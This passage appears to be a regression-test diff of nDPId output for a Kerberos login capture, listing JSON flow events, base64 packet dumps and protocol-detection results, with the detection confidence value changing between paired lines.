TQG53JY\/ENQb\/msmGZtHPqNhhbsdDqH+lmOfUO\/rsFoM+A+A7NKV0HxaXem2+2KDVs6XRB397jCpiwvU21eoJh5MbRZu9lHQPac4fqdiG1NV2bvCajFJpm9\/SiaQ4dO3R6QbX1nOAWcnk43IZF9ySTYBCQwP9oubsRlR8h4+wO4jpZte1r9tWFgXmx0aDkW0KbeaSaYNIE9LNzuOCMDEzbj8aoezV2HzBzRhJ2LasRJ8s5NKC3JTvxuJxOJ3bOEGIBjZD9UXeIpuPtxm+T49xwjEqnejhpn83X7S8bJmoZ1ZQ5mNmBkraSR\/DYBjqqfwYS1GirOyuq6eCpwkeO7L\/3OX7yuoFcQ7F\/mivV4JhL3XkovoYZzrHpYA1kmN6qkQyfvpGGqBeLyNnaEcvYDeARqDcsUyGZ+xvgvFZsq25OIETcjG3sIyB0nzy7ba1mYw0RZ9XvZzmJVujSVewjOmE9K29PdUE\/+orVxXua3kiLosyiXhsQ\/snLAaFP8Q95xi6J2njna\/iquiduA7PW6evhPTixCxSIf8ivXgJg03ljz3j1lKVgTQVXWBG49S7+s3oNhaKA6zBgpoH+MIH7oAMCAQOigfMEgfCfbnuNzqoB0hpVugXPSl61u\/o0AiFH0HluNEtCO\/zCcExA35l04OGC1gH6aG3sbOAtVL0zjnnSshrcN39wa67DJ+FHbuSdE3kCJEF+cg6URhPmpUj2257XKU3gjVRTNW9gbSPgJKKlhaknblR0mV7SuU6d7Lg\/Wj1+zz2sH13Rh6dbGo4FT+T9HaP2ndnqiHLxbH7MQv4hm303HhUQGMfdS5gKXMGoezzcUNcL7Q0QhxZef8Fjm6Apvz8AQrgOKbr0UGXxnHWlWaZvsYpBtFO8piUPee5nAjyNucMhYsRC6Jv2Wkno+aTJzG82WW0TaKg="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716138858,"flow_last_seen":946716138858,"flow_idle_time":200000,"flow_min_l4_payload_len":1213,"flow_max_l4_payload_len":1213,"flow_tot_l4_payload_len":1213,"flow_avg_l4_payload_len":1213,"midstream":0,"thread_ts_msec":946716138858,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1084,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02086{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":946716138858,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1255,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1255,"pkt_l4_len":1221,"thread_ts_msec":946716138858,"pkt":"AAP\/pqsMAAP\/p6sMCABFAATZAbwAAIAREVAKAQwCCgUDAQQ8AFgExfGLbIIEuTCCBLWhAwIBBaIDAgEMo4IEMzCCBC8wggQroQMCAQGiggQiBIIEHm6CBBowggQWoAMCAQWhAwIBDqIHAwUAAAAAAKOCA3NhggNvMIIDa6ADAgEFoQwbCkRFTllEQy5DT02iHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkRFTllEQy5DT02jggMzMIIDL6ADAgEXoQMCAQKiggMhBIIDHQjKO\/OerPJHUVXfuxVJdD6vQ\/NGnGmBmwOn3bLBqbqsG+g9Nnh6yrjY9d5E8AiotGFppGx9xNmwBuNImiFxfNmEg3uH\/dVWHWd9q6uqNxlq4l9BJeInWbk24gfTvjnZPIxaZOXaPKIGWKEoPwfUvG\/abmHOJrJ5dMqDjXn12Gq8qtlDgO9bMEikjGol\/XgOEE3AqGuDQOYN9AD6KcodXf5ljyBptwjxxESj\/S7Kz6h9QlJX\/bPF65u69HCFC8D0O6x6SYPpJQwgF50VHzn1+N9mnFznaYa4AuT0H16bY8ZWk3memHUdpKXbLDzDp6emMp2eXP9emxJFFQUS8M0f5586iB49EBRS2s2EePfPWcS+mN6DYaBg353AwYez1LgB7Puw2NNPPDFlVjYUyyXH0HyxP0DEXpuQEC\/rdkI6wknQh6G9lmGk2V81WgdZlSk+CkiL56oBtMGCilRDVhAoqC0vJ\/kGf6XxSotqKkgy7VrgIiRT5V9xjt1UD8Owk9PKQI1siEvlyDkxYrEr6vzyGdjEEdn1J2\/RqVT6BVnLZeIc6uZNYodQZDbClePn\/tiBzWIRfAABFzPaDqIFcuWvlbnXtgo9ok+GZagM6tVQSYA2oI8Ouq3NIlhKPE5+ABgG8QDVDW9xKR6jazl4jwze2syl\/MUew4xW0tECxLEoLa9NakqgdATDmNUFpJN28enDUQmyRHxLZXoA9\/ospwta8qlV2PwCoVT6RgWgTuQJ3MiC3t0xe4KttF6BQzzO2NIQtnis5g6Y+NA+4n3\/6C06Co88hSP1GAjHrL7luPNd8ekpQbd4VN\/4aBwpNyND5UJJp3UfoikXYoZjPstHkPGruoqJbMAzvEbw0YHk5OawAbEBovxdDTmt0hq2gTWpPyhWURYpkQK96gfjWNYYjdu\/yqBGeN79ct+2MSNrWdYxc8k97LFdE8M8strlBYslyNaAo10tUaZHxe2S1NU0Pje8WixjspIMBprxsDdc+QA2jV2yFgxGRAAixpl7jXmQTHC8SJM8dp5tGAPdd3ds1tc0+eh0QnULGo4wNzIvVyRepIGJMIGGoAMCAReifwR9lMd45uQbgXPTUIapDv8npUAWyRXZFOREDSDyTMId\/udk9oDJ6G\/euSGZP5KVe\/VjIHeDWzWbDfubRUpsXZHld7TQjYmW4Rs1jBphjET6HxcWhRDNxUzPznoCq1aAneOtGkpAE1SAVv5nmbRuATtalQZ+bAF+mz2FCK\/FEcOkcjBwoAcDBQBAgAAAogwbCkRFTllEQy5DT02jITAfoAMCAQOhGDAWGwRob3N0Gw54cDEuZGVueWRjLmNvbaURGA8yMDM3MDkxMzAyNDgwNVqnBgIEMvbUaKgZMBcCARcCAv97AgGAAgEDAgEBAgEYAgL\/eQ=="} -00708{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716138858,"flow_last_seen":946716138858,"flow_idle_time":200000,"flow_min_l4_payload_len":1213,"flow_max_l4_payload_len":1213,"flow_tot_l4_payload_len":1213,"flow_avg_l4_payload_len":1213,"midstream":0,"thread_ts_msec":946716138858,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1084,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} +00708{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716138858,"flow_last_seen":946716138858,"flow_idle_time":200000,"flow_min_l4_payload_len":1213,"flow_max_l4_payload_len":1213,"flow_tot_l4_payload_len":1213,"flow_avg_l4_payload_len":1213,"midstream":0,"thread_ts_msec":946716138858,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1084,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} 02056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":946716138858,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1228,"pkt_l4_len":1194,"thread_ts_msec":946716138858,"pkt":"AAP\/p6sMAAP\/pqsMCABFAAS+SnoAAIARyKwKBQMBCgEMAgBYBDwEqiHZbYIEnjCCBJqgAwIBBaEDAgENowwbCkRFTllEQy5DT02kDzANoAMCAQGhBjAEGwJ1NaWCA3VhggNxMIIDbaADAgEFoQwbCkRFTllEQy5DT02iITAfoAMCAQOhGDAWGwRob3N0Gw54cDEuZGVueWRjLmNvbaOCAzMwggMvoAMCARehAwIBAqKCAyEEggMdqLwk5xMrYJDEwUM\/QQ3VuJIMmn2OQy\/0I5DhAfTNQGcPQSHS5CEPtM6jxjRZTCw0Ai2nHWAOEUdEUEOTCsPK9M6imAlLkM1n1k\/UGy5\/efNw9H0itaqJvDeRfga5lhYWuYKRnVa5Zb2LcF\/jioC043WMRCe+qPxfvoD6RNCKqILp+4B1YsvS2vzC5bMQYCNY08f7Now1c0NTrALudLRPAfPB5qHuxo+5N+QIUogMdV9qnsCd2ZbjBZvLV15UkZvO83kVHjMrBpQvSRkHNM6\/zRHc+YfyXwWcNuMbRJAN7+Y7NptXQN4NQ\/OQONLYDFSpYczYU68F3URsxvORHrchVGGmn8MKbv0DeaLF9\/+1M5uAKlz+88rw9y7LuckjG8DbH5sf7ISfJhh4NpBawzg6k\/JL9yv4tOp\/xZjhDbxy16xt6dThtbRjxdaqF3Oo1fkTqbsbZQ04EfvrQiAKfP8sBfX1niEY31SqDPpx\/8v9Bl4EFm1Lvzn9HEAXkXg08aOVFGh3BlduaucK6Rpky2Svc9ertDKj6f8Jzh5m+eNWEcDW2815fGqRdvI+\/+qRl9E7qnl5GXq1cujOic+M8vy97CJqAPJsJL0kZb9kLdJ7nNjJvKCqlaAeqALPy9KgKZeJI9XzJ\/bmARdSFV3xJS\/loG2otpDyX\/2ZWUUEEYQBfy25AEWmnMEq46q5p8W8sP+x3s3phxQUDhHnECEca5WsO9VlgPBPiXMJUJKXhmrS5SLOi09mh8G5CLVTQ3NPdA3bU+xaruZhwYPHofzIXF6vn7K2SBJl+eOlpH6yNl8HiCimirDhutKQGTz2awDOPcFgFI\/juzSQ1pPwto3mGkmlSzi4GVpCSApYIFoHmyNDW\/TOL6f5HCyq\/trjdKC\/ZHWToa8s93rTdvZG9ggmKkqaDFEkrhUgUNoZm6q0C7CRK\/gWjnTrIuqp6g9Zs5Y3Zi\/GUU52nMhFDbGMTP1y+eYCYah8859k4tGGHP99nZQMMZRm+bwLZF2aQRlHGRkaYdOhdalKGqqR9iVOZE9suIckWSsyYB\/vnKNqXG4WexSmgfUwgfKgAwIBF6KB6gSB54cXkLwMBkHM9GQeHGY5ZtSK62KJIQoTlEQU2I54gWvNeM\/zJ6ckBQIXZfilBpfek4Y7orr+xZTCdwvT6Gkzc8BtAu8Yz26KAHBerh9WWO9UuMFgGKt+q7TjON\/oL8kBFbmuPaEyYkDCskT3ez9VuxsuD8VXmUohQzQmxOOLQNtyXpvmRcjw0Q6TiGceTbHWYeAmvwx+IeCs\/clsg\/iyBjPLq2v90n4ztoRrTjk81TustGQcsaOf4B7RqzGEcyvKXNeQEVbZT3jI5BaO4+aYcmeXzBkymlSvszStGb\/MiP1mGnDZCtbFTw=="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716139910,"flow_last_seen":946716139910,"flow_idle_time":200000,"flow_min_l4_payload_len":1221,"flow_max_l4_payload_len":1221,"flow_tot_l4_payload_len":1221,"flow_avg_l4_payload_len":1221,"midstream":0,"thread_ts_msec":946716139910,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1089,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02093{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":946716139910,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1263,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1263,"pkt_l4_len":1229,"thread_ts_msec":946716139910,"pkt":"AAP\/pqsMAAP\/p6sMCABFAAThAfwAAIAREQgKAQwCCgUDAQRBAFgEzdG6bIIEwTCCBL2hAwIBBaIDAgEMo4IEMzCCBC8wggQroQMCAQGiggQiBIIEHm6CBBowggQWoAMCAQWhAwIBDqIHAwUAAAAAAKOCA3NhggNvMIIDa6ADAgEFoQwbCkRFTllEQy5DT02iHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkRFTllEQy5DT02jggMzMIIDL6ADAgEXoQMCAQKiggMhBIIDHcAYVO+Q2IXUSYyHjuVHfKxUHYGW7TjhCP7ht14YomVNNTmVhUnNVAEemRFIQsjfyH7Id6NfOJsQ1ejL1lbQdxG+gxX6ALA\/MK9eCjPeeH1HN\/61cBhJfEoqY2F\/mKeHRuCggrFXQbZxlsXVGLtZu4PWih8KNf7sWfI01ih\/KOVOFbC+DQgRsewUOZidaGbk8YDAWfLTeW1icWpEgz\/\/XQZftiBtg72zgDTGa\/mE6hUu8t57cVSOGEQlF1ZQKVTTZOn9zHhQisTijr021JJttOf7qpJ5+uomVPYE8lx0pL85ESuIwtqHGJcBMVlPS1H8MreebQzjvMWuoHQUc\/OGtz6S3YhFyDPaOH1iZQXjznPs\/MyXoX\/WPWeAVNxUiY9FXqN8Ysyj493ju1vpN6nhvsrEoaZdGaTppTmaoJXuyc1CSns2LWWlo8V5W5bAI5ei3AXjL1oeF7Et2GbqYgAGntju2FLJBhD\/4R9ROO1oMGYhSCMMKYRZ9+nR1+RMN\/cuq64EBBvfHy6tayyRjsACSMzeD4dT5O1By9VoDbf\/l3TiOVyUpKN6HtnGTLks0PEgzGhBo12SoVAT914LxU8URDkKFF0IvIDKHRP2PfXNHrTqwCKivWiNW4Y4msxofW+KFzIutb67iawdaddMq1dxg27Qc6okQGPjpdNfDl7H1FT8XYGvgXsggcVItUDBSFzgmIrorZjg1UIv0N65LTCbyuSoTSRNZLyNRs5IjZa6b6aNmzfJeURuRlXpFmy55SswzPpOVIbpqN9UjrKoARvOdTXIy7zAlLTf79OOzEiGttGb1lQL8qGp6NvmbBOCY3s1pqh3u0pNR2XX5Z1LkgF8exqSVZL2UsbFy1H87cEdwhSaPgKai6SsQvAamU+n99gLhejxN3\/mg\/VFw+wucn7jxY5D9SmJGaVA97YjoZZdGLogQ15cOtgSBPsYJESl4I46m0Z6YgTQJDNcPvLgJDlNJtTGXZLJ9sOGxpwEknEXtocEjmZZBksfp4wtv7t34FGLYzt1idyslHkz+eOdJAgfnLj7Zmp43EncB0hi68U9pIGJMIGGoAMCAReifwR9ja9JTPG3V\/hvRGIuwwosj7sUS1LIBhu\/Wifub2xWICGiRE3t3KocfEIlQLYWq\/DPZTWwjHn6UXJcc+obF5QFMijJyc7I6Y2c\/iHufGqAYJ55sZ1MlMHaFibC0j1nl7WX824jCbyDB0A7iID0+4KwIDf2mftb7CZ5GwsbZaGkejB4oAcDBQBAgAAAogwbCkRFTllEQy5DT02jKTAnoAMCAQKhIDAeGwRMREFQGxZ2cGMtdzJrM2VudC5kZW55REMuY29tpREYDzIwMzcwOTEzMDI0ODA1WqcGAgQyDNPhqBkwFwIBFwIC\/3sCAYACAQMCAQECARgCAv95"} -00708{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716139910,"flow_last_seen":946716139910,"flow_idle_time":200000,"flow_min_l4_payload_len":1221,"flow_max_l4_payload_len":1221,"flow_tot_l4_payload_len":1221,"flow_avg_l4_payload_len":1221,"midstream":0,"thread_ts_msec":946716139910,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1089,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} +00708{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716139910,"flow_last_seen":946716139910,"flow_idle_time":200000,"flow_min_l4_payload_len":1221,"flow_max_l4_payload_len":1221,"flow_tot_l4_payload_len":1221,"flow_avg_l4_payload_len":1221,"midstream":0,"thread_ts_msec":946716139910,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1089,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} 02065{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":946716139910,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1244,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1244,"pkt_l4_len":1210,"thread_ts_msec":946716139910,"pkt":"AAP\/p6sMAAP\/pqsMCABFAATOSrQAAIARyGIKBQMBCgEMAgBYBEEEukqkbYIErjCCBKqgAwIBBaEDAgENowwbCkRFTllEQy5DT02kDzANoAMCAQGhBjAEGwJ1NaWCA31hggN5MIIDdaADAgEFoQwbCkRFTllEQy5DT02iKTAnoAMCAQKhIDAeGwRMREFQGxZ2cGMtdzJrM2VudC5kZW55REMuY29to4IDMzCCAy+gAwIBF6EDAgEJooIDIQSCAx0OqRcPC8vGYJMz45I+hnyANZGJTsVyPTfCUHSBYlVv3VsQhqvRCnWfKr8tTLjMqudYuEJcF+L7XXCnqhYRSBYCFSiBtDPYZ+zwUrPQcBOUWNrwWN58rjlJI4rsfBOkYxKiA091ERchIo4brfg0wihOd1Khcn2hzhSClVIVccTK\/MjYF+xwb7R+X7kwWhBvkFjfCZEYfA39Px1Z6N8hCMZo9D01bu6vlQ1L2sCTq56bCR\/KPgJuesTh2ci1V8F2+s6Tbp2DXg32HvP74XuVtAG\/HdbFy6FP07mReXboks0HCdmNsIlugwTOFBoA0KdeJzt8rCaVLAPeTF6sn3Wub3dm5MAcVfMzvX6SeOcAKsxjskWhTVsE1CxSWYOUSzDEjqTLi5kitJt9vt0EYDo5nzmFWJL+4tqipdqqhpXyxt\/eIG+ZKjZQnz7edpkZJ1AvWiB3rSygvM8tpdnoQN6M6xvZEVYvRrjduR8WdbAhOyBR5bbA0oQdHGNvLYk4F+wtKfihMmzqYshJJAtUQlY76J08RDvvQfbmoCZY5bAXD\/7kVPF4HPV0cv6EoSU4U\/HcDvpW5plwj64n2qkequshx7O\/if1m8JJBPr46eU4WYs5FeaVHYIuCbvCDprb46iNeeud+9E+PFvI9FTKa8wNRbfXDP8Ovfmd2VJ\/o44eQNFUlizwKCMjBE9mhtfH0exvRf9koiWuOtjPAcGYCwU5ZcidWSgY8qntr4v12EkQ31Ru9iaH7Ds2SQSbUoSlP2AJYJ5N7lcaA4QwH8HXGYNXFhMAvIWTT8gO1ogAVjbRSKZnUhxzylt8Cwxmsviyf0ElQbNqauMI1rIs+2E3U6DIzgZvVE6M+D5xiF\/I6rVkyiSJelPA2z3VWNpqE9DgjCm\/tuHHLGElEBVg5sPGqh4fSKejZiyauGHl8kEx7g0JMP\/mPRFISiUdUoBYEq1n0ex96Hd9j8sDPrIE9lLidr+jj0zrPZoOHVLsPzuKkr0gr77hTeUSayXj23NNBAmIy6xS0IlU5qV8+5PPTp+xEoPRGNzbrV627P5IsgKqwjsNVzqaB\/TCB+qADAgEXooHyBIHvNIbb12U6B68TB7gF\/cQpmJg65K85wYZpHYzYAvTf7nc6Nmbb0GdRruPUOQVRPFzlpfFfYYa5FAFk3n4UHYGqXU5X\/AD0rZUkAb\/DMiELvM8Q+804OYWVkjbxajg5SPY1\/VFM0jodkL9eXE7uZVXCVaan0c9VCVcYGBwSjpydUKhBZjYkNquu5nhriSIUJAaerM1J7JSISt1jRUmzAAal6Bli3pWLBS1Bmwu4xio0vlrXiz88OHTHhzcbkw7W8FEVXb48WriKsXF9DT855WrPQJaunamvGrHPBNTvW5O7J1GsSxunQtlIcRHa8BJwjCw="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716140238,"flow_last_seen":946716140238,"flow_idle_time":200000,"flow_min_l4_payload_len":1211,"flow_max_l4_payload_len":1211,"flow_tot_l4_payload_len":1211,"flow_avg_l4_payload_len":1211,"midstream":0,"thread_ts_msec":946716140238,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1090,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02081{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":946716140238,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1253,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1253,"pkt_l4_len":1219,"thread_ts_msec":946716140238,"pkt":"AAP\/pqsMAAP\/p6sMCABFAATXAgcAAIAREQcKAQwCCgUDAQRCAFgEw7vvbIIEtzCCBLOhAwIBBaIDAgEMo4IEMzCCBC8wggQroQMCAQGiggQiBIIEHm6CBBowggQWoAMCAQWhAwIBDqIHAwUAAAAAAKOCA3NhggNvMIIDa6ADAgEFoQwbCkRFTllEQy5DT02iHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkRFTllEQy5DT02jggMzMIIDL6ADAgEXoQMCAQKiggMhBIIDHcAYVO+Q2IXUSYyHjuVHfKxUHYGW7TjhCP7ht14YomVNNTmVhUnNVAEemRFIQsjfyH7Id6NfOJsQ1ejL1lbQdxG+gxX6ALA\/MK9eCjPeeH1HN\/61cBhJfEoqY2F\/mKeHRuCggrFXQbZxlsXVGLtZu4PWih8KNf7sWfI01ih\/KOVOFbC+DQgRsewUOZidaGbk8YDAWfLTeW1icWpEgz\/\/XQZftiBtg72zgDTGa\/mE6hUu8t57cVSOGEQlF1ZQKVTTZOn9zHhQisTijr021JJttOf7qpJ5+uomVPYE8lx0pL85ESuIwtqHGJcBMVlPS1H8MreebQzjvMWuoHQUc\/OGtz6S3YhFyDPaOH1iZQXjznPs\/MyXoX\/WPWeAVNxUiY9FXqN8Ysyj493ju1vpN6nhvsrEoaZdGaTppTmaoJXuyc1CSns2LWWlo8V5W5bAI5ei3AXjL1oeF7Et2GbqYgAGntju2FLJBhD\/4R9ROO1oMGYhSCMMKYRZ9+nR1+RMN\/cuq64EBBvfHy6tayyRjsACSMzeD4dT5O1By9VoDbf\/l3TiOVyUpKN6HtnGTLks0PEgzGhBo12SoVAT914LxU8URDkKFF0IvIDKHRP2PfXNHrTqwCKivWiNW4Y4msxofW+KFzIutb67iawdaddMq1dxg27Qc6okQGPjpdNfDl7H1FT8XYGvgXsggcVItUDBSFzgmIrorZjg1UIv0N65LTCbyuSoTSRNZLyNRs5IjZa6b6aNmzfJeURuRlXpFmy55SswzPpOVIbpqN9UjrKoARvOdTXIy7zAlLTf79OOzEiGttGb1lQL8qGp6NvmbBOCY3s1pqh3u0pNR2XX5Z1LkgF8exqSVZL2UsbFy1H87cEdwhSaPgKai6SsQvAamU+n99gLhejxN3\/mg\/VFw+wucn7jxY5D9SmJGaVA97YjoZZdGLogQ15cOtgSBPsYJESl4I46m0Z6YgTQJDNcPvLgJDlNJtTGXZLJ9sOGxpwEknEXtocEjmZZBksfp4wtv7t34FGLYzt1idyslHkz+eOdJAgfnLj7Zmp43EncB0hi68U9pIGJMIGGoAMCAReifwR9zEhzGUIWSO2nSAJqmDXobCtcu76K3Rboc\/fF9nnyrTYYtLKR3UTvhOtz+lYZjy30fUznqQuQn9FtrPxZZ9KcR0aeNGj5jFqT78wE7zx10zQdQcEYtMt1Yyoq5p6Q6IsiC81GplCnPyxSQCLZJft+l9Mq1iY\/qnQqSFUZfs6kcDBuoAcDBQBggQAQogwbCkRFTllEQy5DT02jHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkRFTllEQy5DT02lERgPMjAzNzA5MTMwMjQ4MDVapwYCBDItBdKoGTAXAgEXAgL\/ewIBgAIBAwIBAQIBGAIC\/3k="} -00709{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716140238,"flow_last_seen":946716140238,"flow_idle_time":200000,"flow_min_l4_payload_len":1211,"flow_max_l4_payload_len":1211,"flow_tot_l4_payload_len":1211,"flow_avg_l4_payload_len":1211,"midstream":0,"thread_ts_msec":946716140238,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1090,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} +00709{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716140238,"flow_last_seen":946716140238,"flow_idle_time":200000,"flow_min_l4_payload_len":1211,"flow_max_l4_payload_len":1211,"flow_tot_l4_payload_len":1211,"flow_avg_l4_payload_len":1211,"midstream":0,"thread_ts_msec":946716140238,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1090,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} 02047{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":946716140238,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1224,"pkt_l4_len":1190,"thread_ts_msec":946716140238,"pkt":"AAP\/p6sMAAP\/pqsMCABFAAS6Sr0AAIARyG0KBQMBCgEMAgBYBEIEpt71bYIEmjCCBJagAwIBBaEDAgENowwbCkRFTllEQy5DT02kDzANoAMCAQGhBjAEGwJ1NaWCA3NhggNvMIIDa6ADAgEFoQwbCkRFTllEQy5DT02iHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkRFTllEQy5DT02jggMzMIIDL6ADAgEXoQMCAQKiggMhBIIDHdSoYQyi7ff\/cLPWA1HT+38woyNxG7hjyMpFtXNLQ4wwUz2yewJimU\/Syk2Fa\/0Q0E30eV+3qyAUEhdeJ\/mye00Eyjo+t40Omp\/eXw+IGe1ZH6T3PCObVIrhSnpUacK6ii1uuZDD4Rq6I9stqvUPtmYTEfZUghBmSFhKyOF+739jQdMDabCHs42xPF+PE5Khsu\/OuvtkgUlzbOCByNBFPWHM4hq6sxXhGONa32EZ+SoEWcYTpIQzuxousEbeggvFhXEFbIuNBRSFawl6rMWB\/KmaHWXADw8CIbzrEUZstkGSXGF7n2oi7RRxejsRN3c+PeBn7RstHhe0G4eqTB145eevcw23SPSV9euCIwUUxgmQBaJh1SsKM0OGGQYMXd\/X7MRc8Y\/+gAvmDlutKsJJrggZn5cpwu45A1lrsy0RDxzGhWYagdXKP1sdeQyJfZWUj1gaEslI5oAFEndnk8W63AmhpamCf4lKqcUP+3qos7qYekTM2HMg66kqdfdrMwpYncoImN0CBL6cf9PXC\/VC3wKog6Enhmtdig4Q\/rhcleriiYPvB7UzvNKcc32iM3LVFgzhWXwSpxAv4IrTiFRsFL1wKc6eRDWLpbvHSbWELp\/GrXwVikqB0o\/5j+6qBC97w4GyZ8Gu3Fag8PjsReYLk0WL10vGr5Qc4qa7YDMFuS88Hc60sAKfz31rTmI2ndYvD3PWmpyPEqlCdIPgoAa3Kd11qVxwS55WzDEO8k9YZakvP9KiaUbMKHDvw+8GUIpfvAkDNrY3c6GYUCaiQsNuGTGeYW+NrXxWSBG5j2cKtkEW2pMj0v7\/fnPv0o1pLgJl0UzPMq6kLhkoQGC1aC+ANDcZVNQtaYf0juArE6KS6eYgwagrgjn8DbbKE1UxbEnj71zd9MIV2lntPE\/5wNBElNY0OZzjY0k1z+JKn3UlF4k9y\/GwCRua+fbhv3WS6ctnSQrOVVwIJwSSmH9VennduWMRg4\/CLrPyn8iDivCSUXVruZ\/RjO5NoO7Ay+xWX92CZfzP28uqP6g5yOIXxfQF7aEMzvuGnyXGrpGyaj\/HpoHzMIHwoAMCAReigegEgeVL5D9X6hJ97pJp43APBNgTkCTDlRzjmWMnYtfTH2AvHn1h0R2mI58TZnhtl8lC\/7egmLy0XdjJQvyIr0QhH6s9cdKZ+gNDfFgr1ctf5lul4+BKJ7CiDdQRgxJInO6QVh3EuJ5GOm+2RyNu\/ZC2\/D1obkALe8L6KOE0kVvmWG0sBF+cnBegsz7LabfCyqSPSndOogCpJB0w4UneS3xQPcxCdEoirYn9r4tdlA5\/XqbJGs\/Gmbb8y2acBEtu04q1XpFvWuu\/xevycdkVI4OnavQShSYhrsei9lpAin7IICceujNouKy+"} 